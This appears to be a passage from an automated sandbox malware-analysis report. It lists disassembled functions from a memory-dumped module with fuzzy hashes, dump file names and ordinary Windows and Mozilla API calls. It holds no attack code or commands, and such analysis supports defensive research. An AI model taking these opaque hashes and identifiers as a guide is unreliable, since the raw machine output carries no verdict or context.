                                                                  • Opcode Fuzzy Hash: b8d35072cba16821603818f482c9746fc4b0c3a8e5024b705f4395e37815f568
                                                                  • Instruction Fuzzy Hash: 2A62FE7250D345AFD701CE18C0903ABBBF6AF86318F184A4DE4E46BB99C375D985CB82
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ' $0$0$1$9$@
                                                                  • API String ID: 0-2946122015
                                                                  • Opcode ID: f466f95096f12e1dc201d4778bec56598b6ac4a02278eb62bbe8c65951087d09
                                                                  • Instruction ID: d32a4b82511d68c38211ae404df5774c7460d09c73bd320edad65cca52c89f68
                                                                  • Opcode Fuzzy Hash: f466f95096f12e1dc201d4778bec56598b6ac4a02278eb62bbe8c65951087d09
                                                                  • Instruction Fuzzy Hash: 0282F431B093218BD710CF19C49026EB7F5FB85758F558A2AE8E547E90DB38D986CB83
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv$__aullrem
                                                                  • String ID:
                                                                  • API String ID: 2022606265-0
                                                                  • Opcode ID: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction ID: a02fceb65e2d0202e2a3cd5794fab4ce21d831b52f923ea91fbc7b4b498b796f
                                                                  • Opcode Fuzzy Hash: f56df46d33552dd8100cae53d24ae323fb4832d86786e5cbb4b774b0e277ade9
                                                                  • Instruction Fuzzy Hash: 03323832B046129FC718DE2CC890666BBE6AFD9310F09867DE499DB395D730DD05CB91
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6CA28A4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction ID: 4ea5e1a757f19aa79b5f13af850809ed2b6a353804a6b44fdb7b620702f001c1
                                                                  • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                  • Instruction Fuzzy Hash: BFB1C672A0021A8FDB14CE68CC90799B7B2FF95314F1C02A9D549DB795D734A9C9CB90
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,?), ref: 6CA288F0
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CA2925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction ID: 10213436861f9907c5b4e319aecd43297ad3e7e09aa1ffc8ee1f91ac5c9bdc4a
                                                                  • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                  • Instruction Fuzzy Hash: 16B1C372E0021A8BDB14CF68C9816EDB7B2EF94314F1C0269D949EB785D734A9C9CB90
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA28E18
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6CA2925C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset
                                                                  • String ID:
                                                                  • API String ID: 2221118986-0
                                                                  • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction ID: 18b05f82f32e7b317e1bdb5a37f21a6472bff5d868e765609a982d7dc38003b4
                                                                  • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                  • Instruction Fuzzy Hash: 54A1D772E002268FDB14CE68CC807D9B7B2AF95314F1D02B9C949EB785D734A9D9CB90
                                                                  APIs
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CA07A81
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CA07A93
                                                                    • Part of subcall function 6C9D5C50: GetTickCount64.KERNEL32 ref: 6C9D5D40
                                                                    • Part of subcall function 6C9D5C50: EnterCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5D67
                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6CA07AA1
                                                                    • Part of subcall function 6C9D5C50: __aulldiv.LIBCMT ref: 6C9D5DB4
                                                                    • Part of subcall function 6C9D5C50: LeaveCriticalSection.KERNEL32(6CA3F688), ref: 6C9D5DED
                                                                  • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6CA07B31
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
                                                                  • String ID:
                                                                  • API String ID: 4054851604-0
                                                                  • Opcode ID: 8e8a1db19f8e44a0d8ad807e0a1745701bc094029dfbb9f6f62023c01f2f76fa
                                                                  • Instruction ID: f17d15741293cc9799d99f599852d806edfe723720b6a19f815d8902847b7607
                                                                  • Opcode Fuzzy Hash: 8e8a1db19f8e44a0d8ad807e0a1745701bc094029dfbb9f6f62023c01f2f76fa
                                                                  • Instruction Fuzzy Hash: 95B19D317083858BCB14CE24D45065FB7E2BFC939CF194A1CE996A7791DB70E94ACB82
                                                                  APIs
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C9F6D45
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9F6E1E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionExclusiveInitializeLockReleaseVariable
                                                                  • String ID:
                                                                  • API String ID: 4169067295-0
                                                                  • Opcode ID: 968aaa39564177a2428bbff23fd6e08d561b8552cefd0db4905eedc5ffacb52a
                                                                  • Instruction ID: dc0b919e9d8b50c433623afd9bc84b69698d2e55dc17c8ab2426972509035934
                                                                  • Opcode Fuzzy Hash: 968aaa39564177a2428bbff23fd6e08d561b8552cefd0db4905eedc5ffacb52a
                                                                  • Instruction Fuzzy Hash: 1FA18D706183818FD715CF24C590BAEBBF6BF99308F04891DE49A87751DB70E849CB92
                                                                  APIs
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6CA1B720
                                                                  • RtlNtStatusToDosError.NTDLL ref: 6CA1B75A
                                                                  • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,00000000,00000000,?,0000001C,6C9EFE3F,00000000,00000000,?,?,00000000,?,6C9EFE3F), ref: 6CA1B760
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Error$LastMemoryQueryStatusVirtualWin32
                                                                  • String ID:
                                                                  • API String ID: 304294125-0
                                                                  • Opcode ID: 50690614f4b8987aa7d981485fbb9386f9d69b83a8afb22a012b0af5500f3c19
                                                                  • Instruction ID: 4989a0765626c51047e18799a748dabe16f7a622a1fcf3efca6a76986b5aa8cb
                                                                  • Opcode Fuzzy Hash: 50690614f4b8987aa7d981485fbb9386f9d69b83a8afb22a012b0af5500f3c19
                                                                  • Instruction Fuzzy Hash: 47F0C2B0A4920DAEEF019AA1DC85BEFB7BD9B0831DF145229E51161AC0D77895CCC760
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 6C9D4777
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4275171209-1351931279
                                                                  • Opcode ID: f1149b15926fb587e40666802cde5ca39d59f87bcb49356921f2c1af454f089d
                                                                  • Instruction ID: 9c4bc6f88296e3874930a28dcb6db1792cf325f526322c5ce149d9ecb23415e1
                                                                  • Opcode Fuzzy Hash: f1149b15926fb587e40666802cde5ca39d59f87bcb49356921f2c1af454f089d
                                                                  • Instruction Fuzzy Hash: FFB28C71A15B018FC309CF19C590715BBE6FFC5324B2AC7ADE86A9B6A5D731E841CB80
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: __aulldiv
                                                                  • String ID:
                                                                  • API String ID: 3732870572-0
                                                                  • Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction ID: cbb1c12e74bf4f85456be9f02387f51cfd6248a86bf19662796d72ade6c55415
                                                                  • Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
                                                                  • Instruction Fuzzy Hash: D4327131F041198BDF18CE9DC9A17EEB7B2FB88700F16853AD416BBB90D6349D858B91
                                                                  APIs
                                                                  • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C9C03D4,?), ref: 6CA1B955
                                                                  • NtQueryVirtualMemory.NTDLL ref: 6CA1B9A5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: MemoryQueryVirtualrand_s
                                                                  • String ID:
                                                                  • API String ID: 1889792194-0
                                                                  • Opcode ID: 0a77392a2598bd7166b691b34162e62102eac65cd4b9fbbc8611901860d0f51b
                                                                  • Instruction ID: 929eb6484fa0a8acd088d730178abe864cbf4ef78fa92597f25b34208cd0b39e
                                                                  • Opcode Fuzzy Hash: 0a77392a2598bd7166b691b34162e62102eac65cd4b9fbbc8611901860d0f51b
                                                                  • Instruction Fuzzy Hash: C141B671F0521D9FDF04CFA9E891ADEBBB5EF88354F14822AE505A7B04DB309C858B90
                                                                  APIs
                                                                  • memcmp.VCRUNTIME140(?,?,6C9C4A63,?,?), ref: 6C9F5F06
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcmp
                                                                  • String ID:
                                                                  • API String ID: 1475443563-0
                                                                  • Opcode ID: dc25a88dddd17a221bf7d2e3bfad9e8b68573839ddc23ab4c0f244a4a36f55ae
                                                                  • Instruction ID: efb438ad1f79f75c549b10e0e0254dae8a5ff0e5edd7b8e73b3af7d2a662f6ec
                                                                  • Opcode Fuzzy Hash: dc25a88dddd17a221bf7d2e3bfad9e8b68573839ddc23ab4c0f244a4a36f55ae
                                                                  • Instruction Fuzzy Hash: 52C1E375D012099FDB04CF95C5906EEBBF6FF8A318F28815DD865ABB44D732A806CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d9a91f88530ee35eb84a471fa725e770432fc5593085feebb3640a167aaf7396
                                                                  • Instruction ID: 727b004e35bc4eaafb27dc3a063a04cdaef2ab3e85350d9634df4455afaf7d6c
                                                                  • Opcode Fuzzy Hash: d9a91f88530ee35eb84a471fa725e770432fc5593085feebb3640a167aaf7396
                                                                  • Instruction Fuzzy Hash: E942B132A087518BD308CE3CC49075BB3E6BFC9364F198B6DE999A7791D734D9418B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction ID: e8e12eee8708523c1a978861544b6a9e2e14c860ec971d0812d64be532adba17
                                                                  • Opcode Fuzzy Hash: 72fe09860ade046fc3bdcfcdda7f36b59b22c90a724c00f6b1989c1cc893ef4e
                                                                  • Instruction Fuzzy Hash: FB32FA71E006298FCB14CF99C990AADF7B2FF88304F588169C949E7745D735AA86CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction ID: d0d50a035eaccc3793e0a21db3ca0927d03310ba43e479f659d42282e709c857
                                                                  • Opcode Fuzzy Hash: a22d295006b0cf76062ece48329bf5a81d073d80eca1d8f36db09750ec8a7875
                                                                  • Instruction Fuzzy Hash: 5022D871E006298FCB14CF99C980AADF7B2FF88304F6885A9C549E7745D735A986CF90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction ID: b39985873138f1506665d842cedbf1178e46c4d3ee00f3cc49ac5675c192a556
                                                                  • Opcode Fuzzy Hash: 732f8aafec1c0d410ff216b27f2e5c03b4339b09f163d0f101acbef2ddceab04
                                                                  • Instruction Fuzzy Hash: F6220571E04659CFCB15CF98C890AADF7B2FF99304F548699C44AAB705D731A986CF80
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dba1471aacb16541de02cfa68b17db2ce8275ba57160f51f9aba23f1672b59b6
                                                                  • Instruction ID: db262b1a6d33cc2d21a0d1fd4276557cc6b614f17fe39eb0d42abdd703dc885c
                                                                  • Opcode Fuzzy Hash: dba1471aacb16541de02cfa68b17db2ce8275ba57160f51f9aba23f1672b59b6
                                                                  • Instruction Fuzzy Hash: 68F117716087654FD700CE28C8913AAB7E3AFC5318F1D8A2DE8D587781E7789CC98792
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction ID: f52a6825de90e43b4df4c285f6f6aa65f582f7b16e60cdf882153f360e4e1f1b
                                                                  • Opcode Fuzzy Hash: 4e0237b6fe6878b5c9d7142c5b0fdb09dfdf9fcc0206538975243e8437b3ed89
                                                                  • Instruction Fuzzy Hash: 5FA19C71F0021A9BDB08CE69C8917AFB7F2AFC8354F188269D915F7781DB349C068B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2429186680-0
                                                                  • Opcode ID: c43822a7864020febc2ac316aa47fa51da5f5b15654b5cd4703b13fbb8c8dd78
                                                                  • Instruction ID: cda9343832d0a949827cb337e523815621e20436cd544d71e57356df09a191b3
                                                                  • Opcode Fuzzy Hash: c43822a7864020febc2ac316aa47fa51da5f5b15654b5cd4703b13fbb8c8dd78
                                                                  • Instruction Fuzzy Hash: 7A717D71E112198FCF18CF99D8905EDBBB6FF89314F24816ED426AB740D731A946CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentTerminate
                                                                  • String ID:
                                                                  • API String ID: 2429186680-0
                                                                  • Opcode ID: a4d48a3e5023aca02107205f591da7b97010c5083f277c1f4972203e60a3797b
                                                                  • Instruction ID: 7c43ddebd298453d19c7665258e5ac95d5697fcf4c796192648a7599d73f275e
                                                                  • Opcode Fuzzy Hash: a4d48a3e5023aca02107205f591da7b97010c5083f277c1f4972203e60a3797b
                                                                  • Instruction Fuzzy Hash: BD819E75A012199FCB04CFA8D8809EEBBF6FF89314F648269D421BB741D731E946CB90
                                                                  APIs
